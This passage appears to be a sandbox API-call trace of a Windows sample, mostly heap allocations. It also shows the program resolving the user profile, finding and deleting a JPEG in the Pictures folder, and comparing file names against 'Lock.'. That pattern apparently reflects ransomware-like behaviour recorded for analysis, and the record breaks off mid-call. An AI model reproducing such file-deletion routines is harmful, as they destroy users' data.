[0248.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0248.705] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0248.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0248.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0248.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0248.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0248.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0248.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0248.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0248.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0248.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0248.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0248.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0248.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513e8 [0248.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.706] CloseHandle (hObject=0x2a0) returned 1 [0248.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0248.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0248.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0248.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0248.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0248.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0248.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0248.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0248.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0248.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0248.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0248.710] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0248.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0248.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0248.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0248.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0248.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0248.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0248.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0248.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0248.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0248.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0248.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0248.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0248.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0248.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0248.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0248.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0248.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0248.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0248.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0248.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0248.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0248.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0248.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0248.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0248.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0248.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0248.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0248.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0248.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0248.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0248.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0248.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0248.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0248.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0248.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0248.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0248.716] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0248.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0248.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0248.716] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0248.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0248.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0248.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0248.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0248.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0248.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0248.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0248.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0248.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0248.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0248.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0248.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0248.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0248.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0248.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0248.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0248.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0248.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0248.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x44) returned 0x2e58910 [0248.717] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/d6Gq.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\d6Gq.jpg", lpFilePart=0x8cedf4*="d6Gq.jpg") returned 0x21 [0248.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0248.717] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\d6Gq.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\d6gq.jpg")) returned 0x20 [0248.717] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\d6Gq.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389ada20, ftCreationTime.dwHighDateTime=0x1d5e37c, ftLastAccessTime.dwLowDateTime=0x30250f60, ftLastAccessTime.dwHighDateTime=0x1d5e83a, ftLastWriteTime.dwLowDateTime=0x30250f60, ftLastWriteTime.dwHighDateTime=0x1d5e83a, nFileSizeHigh=0x0, nFileSizeLow=0x15327, dwReserved0=0x1, dwReserved1=0x1c, cFileName="d6Gq.jpg", cAlternateFileName="")) returned 0xa87250 [0248.718] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\d6Gq.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\d6gq.jpg")) returned 1 [0248.769] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389ada20, ftCreationTime.dwHighDateTime=0x1d5e37c, ftLastAccessTime.dwLowDateTime=0x30250f60, ftLastAccessTime.dwHighDateTime=0x1d5e83a, ftLastWriteTime.dwLowDateTime=0x30250f60, ftLastWriteTime.dwHighDateTime=0x1d5e83a, nFileSizeHigh=0x0, nFileSizeLow=0x15327, dwReserved0=0x1, dwReserved1=0x1c, cFileName="d6Gq.jpg", cAlternateFileName="")) returned 0 [0248.769] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0248.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0248.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0248.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0248.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0248.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0248.769] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0248.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0248.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0248.770] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0248.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0248.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0248.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0248.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0248.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0248.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0248.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0248.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0248.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0248.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0248.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0248.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0248.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0248.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0248.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0248.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0248.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0248.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0248.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0248.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0248.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0248.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x44) returned 0x2e58910 [0248.771] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/d6Gq.jpg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\d6Gq.jpg", lpFilePart=0x8cf650*="d6Gq.jpg") returned 0x21 [0248.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0248.771] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\d6Gq.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\d6gq.jpg")) returned 0xffffffff [0248.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0248.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0248.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0248.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0248.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0248.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0248.771] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0248.771] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.771] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0248.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0248.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0248.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0248.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0248.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0248.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0248.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0248.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0248.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0248.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0248.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0248.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0248.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0248.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0248.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 